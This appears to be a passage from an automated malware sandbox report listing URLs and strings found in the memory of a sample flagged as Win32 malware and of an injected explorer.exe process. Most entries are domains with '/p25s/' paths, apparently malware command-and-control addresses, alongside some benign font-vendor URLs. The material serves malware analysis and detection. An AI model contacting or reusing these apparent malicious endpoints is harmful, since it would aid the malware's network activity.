          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adamdavisgroup.com/p25s/www.jdyokum.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.adamdavisgroup.comReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allsttk.com
          Source: explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allsttk.com/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.allsttk.comReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anbietertest.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anbietertest.com/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anbietertest.com/p25s/www.hblcfl.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.anbietertest.comReferer:
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.associazionefaber.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.associazionefaber.com/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.associazionefaber.com/p25s/www.fliparcher.store
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.associazionefaber.comReferer:
          Source: explorer.exe, 00000004.00000000.360740274.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.568119582.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.339990008.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.blueskyinteractives.co.uk
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.blueskyinteractives.co.uk/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.blueskyinteractives.co.uk/p25s/www.adamdavisgroup.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.blueskyinteractives.co.ukReferer:
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.couldskuathink.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.couldskuathink.com/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.couldskuathink.com/p25s/www.tjhymzz.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.couldskuathink.comReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.desipizza.uk
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.desipizza.uk/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.desipizza.uk/p25s/www.couldskuathink.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.desipizza.ukReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fliparcher.store
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fliparcher.store/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fliparcher.store/p25s/www.pfokn.online
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fliparcher.storeReferer:
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hblcfl.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hblcfl.com/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hblcfl.com/p25s/www.desipizza.uk
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hblcfl.comReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iftar.rsvp
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iftar.rsvp/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iftar.rsvp/p25s/www.associazionefaber.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iftar.rsvpReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqd964.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqd964.com/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqd964.com/p25s/www.allsttk.com
